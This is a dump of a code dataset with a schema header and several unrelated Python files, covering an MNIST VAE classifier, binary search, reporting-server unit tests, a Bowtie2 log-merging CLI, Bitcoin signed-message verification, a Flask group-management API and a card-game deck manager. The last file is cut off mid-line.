max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
MNIST/CNNClassifiaction.py
AliLotfi92/InfoMax_VAE
8
12789851
import torch from torch.autograd import Variable import torch.nn as nn from torchvision import datasets, transforms from torch.utils.data import DataLoader import torch.optim as optim import math import numpy as np import os import torch.nn.functional as F import torch.nn.init as init import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') class Classification(nn.Module): def __init__(self, z_dim=2): super(Classification, self).__init__() self.z_dim = z_dim self.net = nn.Sequential( nn.Linear(z_dim, 10), nn.ReLU(True), nn.Linear(10, 10), ) self.weight_init() def weight_init(self, mode='normal'): initializer = normal_init for block in self._modules: for m in self._modules[block]: initializer(m) def forward(self, z): return self.net(z).squeeze() class CNNVAE1(nn.Module): def __init__(self, z_dim=2): super(CNNVAE1, self).__init__() self.z_dim = z_dim self.encode = nn.Sequential( nn.Conv2d(1, 28, 4, 2, 1), nn.ReLU(True), nn.Conv2d(28, 28, 4, 2, 1), nn.ReLU(True), nn.Conv2d(28, 56, 4, 2, 1), nn.ReLU(True), nn.Conv2d(56, 118, 4, 2, 1), nn.ReLU(True), nn.Conv2d(118, 2 * z_dim, 1), ) self.decode = nn.Sequential( nn.Conv2d(z_dim, 118, 1), nn.ReLU(True), nn.ConvTranspose2d(118, 118, 4, 2, 1), nn.ReLU(True), nn.ConvTranspose2d(118, 56, 4, 2, 1), nn.ReLU(True), nn.ConvTranspose2d(56, 28, 4, 1), nn.ReLU(True), nn.ConvTranspose2d(28, 28, 4, 2, 1), nn.ReLU(True), nn.ConvTranspose2d(28, 1, 4, 2, 1), nn.Sigmoid(), ) def reparametrize(self, mu, logvar): std = logvar.mul(0.5).exp_() eps = std.data.new(std.size()).normal_() return eps.mul(std).add_(mu) def forward(self, x, no_dec=False, no_enc=False): if no_enc: gen_z = Variable(torch.randn(49, z_dim), requires_grad=False) gen_z = gen_z.to(device) return self.decode(gen_z).view(x.size()) if no_dec: stats = self.encode(x) mu = stats[:, :self.z_dim] logvar = stats[:, self.z_dim:] z = self.reparametrize(mu, logvar) return z.squeeze() else: stats = self.encode(x.view(-1, 784)) mu = stats[:, :self.z_dim] logvar = stats[:, self.z_dim:] z = self.reparametrize(mu, logvar) x_recon = self.decode(z).view(x.size()) return x_recon, mu, logvar, z.squeeze() def normal_init(m): if isinstance(m, (nn.Linear, nn.Conv2d)): init.normal(m.weight, 0, 0.02) if m.bias is not None: m.bias.data.fill_(0) elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)): m.weight.data.fill_(1) if m.bias is not None: m.bias.data.fill_(0) def recon_loss(x_recon, x): n = x.size(0) loss = F.binary_cross_entropy(x_recon, x, size_average=False).div(n) return loss def kl_divergence(mu, logvar): kld = -0.5 * (1 + logvar - mu ** 2 - logvar.exp()).sum(1).mean() return kld use_cuda = torch.cuda.is_available() device = 'cuda' if use_cuda else 'cpu' print('This code is running over', device) max_iter = int(20) batch_size = 100 z_dim = 2 lr_C = 0.001 beta1_C = 0.9 beta2_C = 0.999 z_dim = 2 training_set = datasets.MNIST('./tmp/MNIST', train=True, download=True, transform=transforms.ToTensor()) test_set = datasets.MNIST('./tmp/MNIST', train=False, download=True, transform=transforms.ToTensor()) data_loader = DataLoader(training_set, batch_size=batch_size, shuffle=True) test_loader = DataLoader(test_set, batch_size=10000, shuffle=True, num_workers=3) VAE = CNNVAE1().to(device) VAE.load_state_dict(torch.load('./Info_VAE_CNN')) C = Classification().to(device) optim_C = optim.Adam(C.parameters(), lr=0.005, betas=(beta1_C, beta2_C)) criterion = nn.CrossEntropyLoss() print('Network is loaded') Result = [] for epoch in range(max_iter): train_loss = 0 for batch_idx, (x_true, target) in enumerate(data_loader): x_true, target = x_true.to(device), target.to(device) z = VAE(x_true, no_dec=True) outputs = C(z) loss = criterion(outputs, target) optim_C.zero_grad() loss.backward() optim_C.step() train_loss += loss.item() if batch_idx % 100 == 0: print('Train Epoch: {} [{}/{} ({:.0f}%)] \t Loss: {:.6f} '.format(epoch, batch_idx * len(x_true), len(data_loader.dataset), 100. * batch_idx / len(data_loader), loss.item(), )) print('====> Epoch: {}, \t Average loss: {:.4f}' .format(epoch, train_loss / (batch_idx + 1))) Result.append(('====>epoch:', epoch, 'loss:', train_loss / (batch_idx + 1), )) (x_test, labels) = iter(test_loader).next() x_test, labels = x_test.to(device), labels.to(device) z = VAE(x_test.to(device), no_dec=True) outputs = C(z) _, predicted = torch.max(outputs.data, 1) Accuracy = (predicted == labels).sum().item()/x_test.size(0) Result.append(Accuracy) with open("InfoAccuracyCNN.txt", "w") as output: output.write(str(Result))
2.84375
3
binary_search.py
giuliasindoni/Algorithm-runtimes
1
12789852
import math from quick_sort import quick_sort import numpy import time import matplotlib.pyplot as plt def binary_search(sortedarray, key): left = 0 right = len(sortedarray) - 1 while left <= right: mid = math.floor((left + right) / 2) if key == sortedarray[mid]: return mid else: if key < sortedarray[mid]: right = mid -1 else: left = mid + 1 return -1 #x = [49, 50, 50, 50, 900] #mykey = 50 #print(binary_search(x, mykey))
3.6875
4
unittests/test_reporting_server.py
stepanandr/taf
10
12789853
# Copyright (c) 2011 - 2017, Intel Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """``test_reporting_server.py`` `Unittests for reporting server functions` """ import sys import os import pytest sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../reporting'))) from reporting.reporting_server import XMLReportingServer, imp_plugins xmlrpcsrv = XMLReportingServer() @pytest.fixture(scope="function", autouse=True) def reporting_server(): opts = {'loglevel': 'DEBUG', 'logprefix': 'main', 'port': '18081', 'logdir': 'logs', 'multiuser': True} class CustomOptsParser(object): def __init__(self): self.multiuser = True self.port = '18081' self.logprefix = 'main' self.logdir = 'logs' self.loglevel = 'DEBUG' opts = CustomOptsParser() xmlrpcsrv = XMLReportingServer() xmlrpcsrv.setup(opts) sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "../plugins/", './'))) imp_plugins("reports") imp_plugins("connectors") return xmlrpcsrv @pytest.fixture(scope="function", autouse=True) def reporting_server_with_config(reporting_server): reporting_server.xmlrpc_open("test_client-1") reporting_server.xmlrpc_reportadd("test_client-1", "xml") reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "options", [['update', None]]) reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "cfgfile", None) reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", None) reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['chipName', 'SomeSwitch']) reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['TM buildname', '192.168.127.12-SomeSwitch']) reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html") reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlcfg", None) return reporting_server def test_client_config(reporting_server): """Verify that client config can be created and reports can be removed. """ reporting_server.xmlrpc_open("test_client-1") # check if status of client is Active assert reporting_server.clients.get("test_client-1", "status") == "Active" # add xml report reporting_server.xmlrpc_reportadd("test_client-1", "xml") assert reporting_server.clients.get("test_client-1", "reports") == {"xml": True} reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html") # check attr on report object assert reporting_server._reports['XML']['test_client-1'].htmlfile == "1.html" reporting_server.xmlrpc_shutdown() def test_post(reporting_server_with_config): """Verify that post command is True. """ post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname", "Run", ['Simple brief of test case', '-# First step\n-# Second step'], {'platform': 'SomeSwitch', 'build': '192.168.127.12-SomeSwitch'}, "None"] # Check if post successful assert reporting_server_with_config.xmlrpc_post(*post_data1), "xmlrpc_post operation is False" # Check if queuelen works def test_queue(reporting_server_with_config): """Verify that operation with queue is working. """ expected_queuelist = [{'status': 'Run', 'info': {'platform': 'SomeSwitch', 'build': '1.2.3.4-SomeSwitch'}, 'client': 'test_client-1', 'build': 'SomeSwitch', 'report': ['Simple brief of test case', '-# First step\n-# Second step'], 'suite': 'test.test_suite', 'tc': 'test_tcname', 'build_info': 'None'}] post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname", "Run", ['Simple brief of test case', '-# First step\n-# Second step'], {'platform': 'SomeSwitch', 'build': '1.2.3.4-SomeSwitch'}, "None"] # Check if queue is empty assert reporting_server_with_config.xmlrpc_queuelist() == [], "Queuelen is not empty" # Send post request reporting_server_with_config.xmlrpc_post(*post_data1) # Get queue list assert reporting_server_with_config.xmlrpc_queuelist() == expected_queuelist # Check if queuelen is 1 assert reporting_server_with_config.xmlrpc_queuelen() == 1, "Queuelen is not right" # Call queuedropcmd and check queuelen assert reporting_server_with_config.xmlrpc_queuedropcmd(0) == expected_queuelist[0] assert reporting_server_with_config.xmlrpc_queuelen() == 0 def test_cmdproc(reporting_server_with_config): """Verify that operation with cmdproc is work. """ reporting_server_with_config.xmlrpc_cmdprocdisable() assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is False and cmdproc is True", "Watchdog is False. cmdprocdisable doesn't work." reporting_server_with_config.xmlrpc_cmdprocenable() assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is True and cmdproc is True", "Watchdog is True. cmdprocdisable doesn't work."
1.921875
2
python/en/archive/dropbox/miscellaneous_python_files/data4models_old_old.py
aimldl/coding
0
12789854
#!/usr/bin/env python3 # -*- coding: utf-8 -*- ''' data4models.py # Sentiment Indentification for Roman Urdu ''' import numpy as np import pandas as pd class Data: # Constructor def __init__( self, config ): self.config = config def split( self, df ): ''' Split the (entire) data into training data & test data ''' assert isinstance( df, pd.DataFrame), 'df must be a pandas.DataFrame.' test_split_ratio = self.config.test_split_ratio print(f'Data.preprocess.split: test_split_ratio= {test_split_ratio}' ) reviews = df['review'] sentiments = df['sentiment'] n_dataset = df.shape[0] n_test = int( n_dataset * test_split_ratio ) # 0.7 n_training = n_dataset - n_test # 0.3 # Use indexcing to split the data. index_data = np.arange( n_dataset ) index_training = np.random.choice( index_data, n_training, replace=False ) index_test = np.delete( index_data, index_training ) data_training_np = reviews.loc[ index_training ].values data_test_np = reviews.loc[ index_test ].values labels_training_np = sentiments.loc[ index_training ].values labels_test_np = sentiments.loc[ index_test ].values print(f' number of dataset =', n_dataset ) print(f' np.shape(x_train) =', np.shape(data_training_np) ) print(f' np.shape(y_train) =', np.shape(labels_training_np) ) print(f' np.shape(x_test) =', np.shape(data_test_np) ) print(f' np.shape(y_test) =', np.shape(labels_test_np) ) return data_training_np, labels_training_np, data_test_np, labels_test_np # x_train, y_train, x_test, y_test # def __init__( self, x, y, config ): # self.config = config # self.x = x # shape = (length, dimension) # self.y = y # shape = (length,) def split( self, split_rate=[0.7, 0.2, 0.1] ): ''' The default ratio to split the training, evaluation, & test data is 7:2:1. ''' print( 'split_rate = ', split_rate ) length, dimension = np.shape( self.x ) # Split the (entire) data into training data & test data n_training = int( length * split_rate[0] ) # 0.7 n_evaluation = int( length * split_rate[1] ) # 0.2 n_test = length - n_training - n_evaluation # Use indexcing to split the data. index_data = np.arange( length ) # 13704, [0, length-1] index_training = np.random.choice( index_data, n_training, replace=False ) # 9592 index_temp = np.delete( index_data, index_training ) # 4112 index_evaluation = np.random.choice( index_temp, n_evaluation ) # 2740 index_test = np.delete( index_temp, index_evaluation ) # 3547, This must be 1372! data_training = self.x[ index_training, : ] data_evaluation = self.x[ index_evaluation, : ] data_test = self.x[ index_test, : ] labels_training = self.y[ index_training ] labels_evaluation = self.y[ index_evaluation ] labels_test = self.y[ index_test ] training = [data_training, labels_training] evaluation = [data_evaluation, labels_evaluation] test = [data_test, labels_test] return training, evaluation, test # #=====================================================================# # # The above variables don't have the leading self. to improve readability. # self.length = length # = size, or n_data # self.dimension = dimension # # self.n_training = n_training # self.n_test = n_test def load(self, batch_size): data_length = len( self.data_training ) if data_length >= batch_size: # Because of replace=False, # ValueError: Cannot take a larger sample than population when 'replace=False' index = np.random.choice( data_length, batch_size, replace=False ) data = self.data_training[ index,: ] labels = self.labels_training[ index ] self.data_training = np.delete( self.data_training, index, axis=0 ) self.labels_training = np.delete( self.labels_training, index ) done = True else: #data_length < batch_size: self.data_training = self.x[ self.index_training ] self.labels_training = self.y[ self.index_training ] done = False return data, labels, done # EOF
3.234375
3
rfcommands/cli/merge.py
ribosomeprofiling/RFCommands
1
12789855
<reponame>ribosomeprofiling/RFCommands<gh_stars>1-10 # -*- coding: utf-8 -*- from .main import * from ..merge.bowtie2_logs import merge_bowtie2_logs from ..merge.overall_stats import merge_overall_stats @cli.group() def merge(): """ Merges logs and csv files. """ pass @merge.command() @click.argument( "input_log_paths", nargs = -1, type = click.Path(exists = True)) @click.option('--out', '-o', type = click.Path(exists = False)) def bowtie2_logs(input_log_paths, out): """ Merge alignment statistics coming from Bowtie2 or Hisat2. This is done by summing up the corresponding counts and calculating the percentages. This version is implemented for single-end reads only. So it won't work for paired end statistics yet. Though it is not hard to extend this script to paired-end read case. """ print("Merging bowtie2 logs.") if len(input_log_paths) == 0: exit("There has to be at least one log file as input.") return merge_bowtie2_logs(input_logs = input_log_paths, output = out) @merge.command() @click.argument( "input_stats", nargs = -1, type = click.Path(exists = True)) @click.option('--out', '-o', type = click.Path(exists = False)) def overall_stats(input_stats, out): """ Combine individual stats coming from separate files into one. This script takes the overall alignment stats files (in csv format) where each file is coming from one sample only. It merges these files in one big table where each column corresponds to one experiment. """ if len(input_stats) < 1 : exit("At least one input file is needed.") merge_overall_stats( stat_files = input_stats, out = out ) ################################################################################ def _concat_csv( csv_file_list, output_file ): """ Helper function for concat_csv """ import pandas as pd input_dfs = list( map( lambda x : pd.read_csv(x, header = [0], index_col = [0] ), csv_file_list ) ) result_df = pd.concat(input_dfs, axis = 0, sort = False) result_df.to_csv(output_file) return result_df @merge.command() @click.argument( "input_csvs", nargs = -1, type = click.Path(exists = True)) @click.option('--out', '-o', type = click.Path(exists = False)) def concat_csv(input_csvs, out): """ Concatenates the given csv files Concatenates the given csvs in the given order and writes the output is written in csv format. The concatenation is done using pandas so the column names must be compatible in the given csv files. """ if len(input_csvs) < 1 : exit("At least one input file is needed.") _concat_csv(input_csvs, out) ################################################################################
2.46875
2
blockchains-cryptos/BTC_P2PKH_sigvef_eg.py
black-wolfie/blockchain-with-python-3
2
12789856
# -*- coding: utf-8 -*- """ Created on Wed Jul 4 22:46:11 2018 """ import BTC_P2PKH_sigvef as bv # verifying two P2PKH Bitcoin signed messages address = 'bitcoin:16vqGo3KRKE9kTsTZxKoJKLzwZGTodK3ce' signature = ('HPDs1TesA48a9up4QORIuub67VHBM37X66skAYz0Esg23gdfMu'+ 'CTYDFORc6XGpKZ2/flJ2h/DUF569FJxGoVZ50=') message = 'test message' bv.sig_vef_P2PKH(address, signature, message) address2 = "<KEY>" message2 = "test message" signature2 = ("IPn9bbEdNUp6+bneZqE2YJbq9Hv5aNILq9E" + "5eZoMSF3/fBX4zjeIN6fpXfGSGPrZyKfHQ/c/kTSP+NIwmyTzMfk=") bv.sig_vef_P2PKH(address2, signature2, message2)
2.640625
3
diayn/post_epoch_funcs/df_env_eval.py
fgitmichael/SelfSupevisedSkillDiscovery
0
12789857
<gh_stars>0 import numpy as np import matplotlib.pyplot as plt import torch import torch.nn.functional as F from diayn_cont.post_epoch_funcs.df_env_eval import DfEnvEvaluationDIAYNCont import rlkit.torch.pytorch_util as ptu from rlkit.samplers.data_collector.path_collector import MdpPathCollector import self_supervised.utils.my_pytorch_util as my_ptu from seqwise_cont_skillspace.utils.get_colors import get_colors class DfEnvEvaluationDIAYN(DfEnvEvaluationDIAYNCont): def __init__(self, *args, skill_dim, **kwargs, ): super().__init__(*args, **kwargs) self.skill_dim = skill_dim def collect_skill_influence_paths(self) -> dict: assert isinstance(self.seq_collector, MdpPathCollector) skill_array = [number for number in range(self.seq_collector._policy.skill_dim)] skill_ids = [] skills = [] for skill_id, skill in enumerate(skill_array): self.seq_collector._policy.skill = skill self.seq_collector.collect_new_paths( max_path_length=self.seq_len, num_steps=self.seq_len, discard_incomplete_paths=False ) skills.append(skill) skill_ids.append(skill_id) skill_influence_paths = self.seq_collector.get_epoch_paths() skill_influence_paths = list(skill_influence_paths) assert isinstance(skill_influence_paths, list) for skill_id, skill, path in zip(skill_ids, skills, skill_influence_paths): path['skill_id'] = skill_id path['skill'] = skill self._check_skill_influence_paths(skill_influence_paths) skill_influence_paths = self._stack_paths(skill_influence_paths) return skill_influence_paths @torch.no_grad() def apply_df( self, *args, next_observations, **kwargs ) -> dict: next_observations = ptu.from_numpy(next_observations) skill_recon = my_ptu.eval(self.df_to_evaluate, next_observations) ret_dict = dict(skill_recon=skill_recon) return ret_dict def plot_posterior( self, *args, epoch, skill_recon, skill_id, skill, **kwargs ): pass def classifier_evaluation( self, *args, epoch, skill_recon, skill, **kwargs ): #skills_np = np.array([np.array([_skill] * self.seq_len) for _skill in skill]) assert isinstance(skill, list) assert skill_recon.shape[:-1] == torch.Size((len(skill), self.seq_len)) skill_recon_reshaped = skill_recon.reshape(len(skill) * self.seq_len, -1) assert my_ptu.tensor_equality(skill_recon_reshaped[:self.seq_len], skill_recon[0,]) skills = torch.stack([torch.tensor(skill)] * self.seq_len, dim=-1).reshape(len(skill) * self.seq_len) df_accuracy_eval = F.cross_entropy(skill_recon_reshaped.cpu(), skills.cpu()) self.diagno_writer.writer.writer.add_scalar( tag=self.get_log_string("Classifier Performance/Eval"), scalar_value=df_accuracy_eval, global_step=epoch, )
1.992188
2
app/blueprints/api/v1/ag/__init__.py
Info-ag/labplaner
7
12789858
''' basic blueprint routes for interacting with an AG ''' # import third party modules import re from flask import Blueprint, request, jsonify, g, url_for, flash, redirect from sqlalchemy.sql import exists, and_ from werkzeug.exceptions import BadRequest, PreconditionFailed # import database instance from app.models import db # import app with config etc. from app import app # import database models from app.models.ag import AG, AGSchema, AGSchemaIntern from app.models.associations import UserAG # import utilities from app.util import requires_auth from app.util.assocations import requires_mentor, requires_member_association from app.util.ag import requires_ag from app.util.user import get_user_by_username # import additional blueprints regarding applications, invitations and messages of ags from app.blueprints.api.v1.ag import applications, invitations, messages # import regex config for creating an ag from config.regex import AGRegex # declare the blueprint variable for this blueprint bp = Blueprint('ag_api', __name__) # register the additional blueprints app.register_blueprint(invitations.bp, url_prefix='/invitations') app.register_blueprint(applications.bp, url_prefix='/applications') app.register_blueprint(messages.bp, url_prefix='/messages') #declare the needed marshmallow schemas ag_schema_intern = AGSchemaIntern() ag_schema = AGSchema() ags_schema = AGSchema(many=True) @bp.route('/', methods=['POST']) # check that the requester is authenticated/logined @requires_auth() def add_ag(): ''' Create a new AG. The request body has to include the following: :key: name: AG name used to identify the ag (eg. /ag/<name>) :key: display_name: AG name that is human read able (can contain spaces etc.) :key: description: A description of the AG :return: If everything went as it should, the newly created AG is returned. ''' # read request values name = request.values.get('name') display_name = request.values.get('display_name') description = request.values.get('description') # check that the ag name and displayname is not used before and # check that the values match the regex pattern # if something isn't right return a error message if db.session.query(exists().where(AG.name == name)).scalar() or not bool( re.match(AGRegex.name, name)): return jsonify({'reason': 'name'}), 400 if db.session.query(exists().where(AG.display_name == display_name)).scalar() or not bool( re.match(AGRegex.display_name, display_name)): return jsonify({'reason': 'display_name'}), 400 if not bool(re.match(AGRegex.description, description)): return jsonify({'reason': 'description'}), 400 # create a new database AG entry ag: AG = AG() ag.name = name ag.display_name = display_name ag.description = description ag.color = request.values.get('color', default='primary') # Add the AG entry to the DB to create a new id db.session.add(ag) db.session.flush() # Create the association entry to the creating user, so he is added as mentor user_ag = UserAG() user_ag.user_id = g.session.user_id user_ag.ag_id = ag.id user_ag.status = 'ACTIVE' user_ag.role = 'MENTOR' # add the association entry and save the database changes db.session.add(user_ag) db.session.commit() # return a success message return jsonify({'status': 'success', 'redirect': url_for('ag.invite_ag', ag_name=ag.name)}), 200 @bp.route('/id/<ag_id>', methods=['GET']) # check that the requester is authenticated/logined @requires_auth() # check that the ag with the ag_id exist and add it to the params/kwargs @requires_ag() def get_ag_by_id(ag_id, ag): ''' Query an AG specified by its id :param ag_id: A specific id :return: JSON representation of the AG ''' # if the requester is a member of the ag --> return the schema for a member # else --> return the schema for a foreign if db.session.query(exists().where(UserAG.user_id == g.session.user_id and \ UserAG.ag_id == ag_id)).scalar(): return ag_schema_intern.jsonify(ag), 200 else: return ag_schema.jsonify(ag), 200 @bp.route('/name/<ag_name>', methods=['GET']) # check that the requester is authenticated/logined @requires_auth() # check that the ag with the ag_name exist and add it to the params/kwargs @requires_ag() def get_ag_by_name(ag_name, ag): ''' Query an AG specified by its unique name :param name: A specific AG name :return: JSON representation of the AG ''' # if the requester is a member of the ag --> return the schema for a member # else --> return the schema for a foreign if db.session.query(exists().where(UserAG.user_id == g.session.user_id and \ UserAG.ag_id == ag.id)).scalar(): return ag_schema_intern.jsonify(ag), 200 else: return ag_schema.jsonify(ag), 200 @bp.route('/<ag_id>', methods=['PUT']) # check that the requester is authenticated/logined @requires_auth() # check that the requester is a mentor of the ag # add the user_ag association and the ag to the params/kwargs @requires_mentor() def change_ag_values(ag_id, ag, user_ag): ''' Change values of an AG. The request body may include the following: :key: display_name: String with new display_name :key: description: String with new description :param ag_id: AG id for which ag the provided values should be changed :return: ''' # read the request vaalues display_name = request.values.get('display_name', default=None) description = request.values.get('description', default=None) value_changed = False # checks if the display_name or description got transmitted # if so update the ag entry if display_name is not None and bool(re.match(AGRegex.display_name, display_name)): ag.display_name = display_name value_changed = True if description is not None and bool(re.match(AGRegex.description, description)): ag.description = description value_changed = True # if some value got changed, merge the entry to the database and return a success message if value_changed: db.session.merge(ag) db.session.commit() return jsonify({'status': 'success'}), 200 # else return a BadRequest message else: return BadRequest() @bp.route('/', methods=['GET']) # check that the requester is authenticated/logined @requires_auth() def get_all_ags(): ''' Query up to 20 ags The request body may include the following: :key: count: Int with the count how much ags to return --> if greater than 20, it will be set to 20 :default: 5 :key: offset: Int how many entries to skip :default: 0 :return: JSON Representation of the AGs ''' # read request params and set default if not set count = request.args.get('count', default=5, type=int) offset = request.args.get('offset', default=0, type=int) # adjust to a max of 20 if count > 20: count = 20 # query all ags (with limit and offset) all_ags = AG.query.offset(offset).limit(count).all() # return a json representation return ags_schema.jsonify(all_ags) @bp.route('<ag_name>/submit_setting', methods=['GET']) # check that the requester is authenticated/logined @requires_auth() # check that the requester is a mentor of the ag # add the user_ag association and the ag to the params/kwargs @requires_mentor() def update_users(ag_name, user_ag, ag): ''' Update the roles of users in an ag The Request body includes following: :key: <user_id>: unique database id of the user --> :value: <role> --> 'MENTOR' or 'PARTICIPIANT' :param ag_name: ag_name of the ag to be edited automatic filled params :param user_ag: database entry of the association bewteen the request user and the ag --> get filled by @requires_mentor :param ag: database entry of the ag --> get filled by @requires_mentor :return: redirect to the ag dashboard ''' # for every key in rquest values --> for every user/user_id passed by the form for user_id in request.values: # the role the user got assigned to be role = request.values.get(user_id) # query the database entry of the association between the user to be edited an the ag edit_user_ag = db.session.query(UserAG).filter(and_(UserAG.user_id == user_id,\ UserAG.ag_id == ag.id)).scalar() # if there is an result for this user <==> the user is in the ag if edit_user_ag: # update his role and simulate the changes edit_user_ag.role = role db.session.flush() # if there are no mentors left if not ag.mentors: # throw error flash(u'An AG needs a minimum of one Mentor', 'error') return redirect(url_for('ag.ag_settings', ag_name=ag_name)) # if there are still mentors # --> save changes to the database and redirect to the ag dashboard db.session.commit() flash(f'Successfully changed the roles in {ag.display_name}', 'success') return redirect(url_for('ag.ag_dashboard', ag_name=ag_name)) @bp.route('<ag_name>/leave') # check that the requester is authenticated/logined @requires_auth() # check if the requester has a association to the ag # add the association and the ag to the params/kwargs @requires_member_association() def leave_ag(ag_name, ag, user_ag): ''' leave the specified ag :param ag_name: name of the ag to leave automatic filled params :param user_ag: database entry of the association bewteen the request user and the ag --> get filled by @requires_member_association :param ag: database entry of the ag --> get filled by @requires_member_association :return: redirect to the dashboard ''' # if the user is not a actual user of the ag # return a error message if user_ag.role == 'NONE': flash('You cannot leave an AG you are not in', 'error') return redirect(url_for('ag.ag_dashboard', ag_name=ag_name)) # else: update the entry, so the user is no member anymore and left the ag user_ag.role = 'NONE' user_ag.status = 'LEFT' # simulate the changes db.session.flush() # if there are no members left in the ag if not ag.actual_users: # delete the ag db.session.delete(ag) db.session.flush() # save a success message flash(f'You sucessfully left and deleted the AG {ag.name}', 'success') # else if there are no mentors left, but still members elif not ag.mentors: # return a error message # dont save the changes to the database and return to the ag dashboard flash(f'You cannot leave an AG, when there is no Mentor left afterwards', 'error') return redirect(url_for('ag.ag_dashboard', ag_name=ag_name)) # else else: # save a success message flash(f'You sucessfully left the AG {ag.name}', 'success') # save the cganges to the database and return with the saved success message to the dashboard db.session.commit() return redirect(url_for('index')) @bp.route('<ag_name>/kick/<user_name>') # check that the requester is authenticated/logined @requires_auth() # check @requires_mentor() # check that the requester is a mentor of the ag # add the user_ag association and the ag to the params/kwargs @requires_mentor() def kick_user(ag_name, user_name, ag, user_ag): ''' kick a user out of an ag :param ag_name: name of the ag to kick the user out :param user_name: username of the user to be kicked out automatic filled params :param user_ag: database entry of the association bewteen the request user and the ag --> get filled by @requires_member_association :param ag: database entry of the ag --> get filled by @requires_member_association :return: redirect to the dashboard ''' # query the user and his associatin user = get_user_by_username(user_name) edit_user_ag = db.session.query(UserAG).filter_by(user_id=user.id, ag_id=ag.id).scalar() # if the user is not an actual user if edit_user_ag is None or edit_user_ag.role == 'NONE': # return to the ag dashboard with a error message flash(f'You cannot kick {user.username} from {ag.display_name}.') return redirect(url_for('ag.ag_dashboard', ag_name=ag_name)) # else # change the association entry, so the user is not a member of the ag anymore # and his status is kicked edit_user_ag.role = 'NONE' edit_user_ag.status = 'KICKED' # simulate the changes db.session.flush() # if there are no members left if not ag.actual_users: # delete the ag and return to the dashboard db.session.delete(ag) db.session.commit() flash(f'You sucessfully left and deleted the AG {ag.display_name}', 'success') return redirect(url_for('index')) # else if there are no mentors left elif not ag.mentors: # save a error message flash(f'You cannot kick the last Mentor of {ag.display_name}', 'error') # else else: # save a success message and save the changes to the database flash(f'You sucessfully kicked {user.username} from the AG {ag.display_name}', 'success') db.session.commit() # return to the ag dashboard return redirect(url_for('ag.ag_dashboard', ag_name=ag_name)) @bp.route('<ag_name>/delete') # check that the requester is authenticated/logined @requires_auth() # check that the requester is a mentor of the ag # add the user_ag association and the ag to the params/kwargs @requires_mentor() def delete_ag(ag_name, ag, user_ag): ''' delete an ag :param ag_name: name of the ag to be deleted automatic filled params :param user_ag: database entry of the association bewteen the request user and the ag --> get filled by @requires_member_association :param ag: database entry of the ag --> get filled by @requires_member_association :return: redirect to the dashboard ''' # delete the ag db.session.delete(ag) # save the changes db.session.commit() # return to the dashboard with a success message flash(f'You successfully deleted the AG {ag.display_name}', 'success') return redirect(url_for('index'))
2.59375
3
invoked_dragoon.py
nisegami/dart-consistency-checker
0
12789859
from typing import List, Optional, Tuple from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game class InvokedDragoonManager(Manager): # Invoked aleister = Card("Aleister the Invoker", CardType.MONSTER) invocation = Card("Invocation", CardType.SPELL) meltdown = Card("Magical Meltdown", CardType.SPELL) terraforming = Card("Terraforming", CardType.SPELL) # Extenders jester = Card("Jester Confit", CardType.MONSTER) souls = Card("Magicians' Souls", CardType.MONSTER) # Trickstar Engine candina = Card("Trickstar Candina", CardType.MONSTER) corobane = Card("Trickstar Corobane", CardType.MONSTER) lightstage = Card("Trickstar Lightstage", CardType.SPELL) set_rotation = Card("Set Rotation", CardType.SPELL) # Draw desires = Card("Pot of Desires", CardType.SPELL) upstart = Card("Upstart Goblin", CardType.SPELL) # Hand Traps nibiru = Card("Nibiru, the Primal Being", CardType.MONSTER) ash = Card("Ash Blossom & Joyous Spring", CardType.MONSTER) ogre = Card("Ghost Ogre & Snow Rabbit", CardType.MONSTER) droll = Card("Droll & Lock Bird", CardType.MONSTER) veiler = Card("Effect Veiler", CardType.MONSTER) gamma = Card("PSY-Framegear Gamma", CardType.MONSTER) driver = Card("PSY-Frame Driver", CardType.MONSTER) crow = Card("D.D. Crow", CardType.MONSTER) belle = Card("Ghost Belle & Haunted Mansion", CardType.MONSTER) meister = Card("Skull Meister", CardType.MONSTER) imperm = Card("Infinite Impermanence", CardType.TRAP) # Dragoons dm = Card("Dark Magician", CardType.MONSTER) red_eyes = Card("Red-Eyes Black Dragon", CardType.MONSTER) ref = Card("Red-Eyes Fusion", CardType.SPELL) magicalized_fusion = Card("Magicalized Fusion", CardType.SPELL) # Misc fleur = Card("<NAME>, the Knighted", CardType.MONSTER) droplet = Card("Forbidden Droplet", CardType.SPELL) called = Card("Called by the Grave", CardType.SPELL) cyclone = Card("Cosmic Cyclone", CardType.SPELL) duster = Card("Harpie's Feather Duster", CardType.SPELL) mind_control = Card("Mind Control", CardType.SPELL) prison = Card("Ice Dragon's Prison", CardType.TRAP) judgment = Card("Solemn Judgment", CardType.TRAP) # Extra Deck carrier = Card("Union Carrier", CardType.EXTRA_DECK) almiraj = Card("Salamangreat Almiraj", CardType.EXTRA_DECK) gardna = Card("Secure Gardna", CardType.EXTRA_DECK) artemis = Card("Artemis, the Magistus Moon Maiden", CardType.EXTRA_DECK) mechaba = Card("Invoked Mechaba", CardType.EXTRA_DECK) augoeides = Card("Invoked 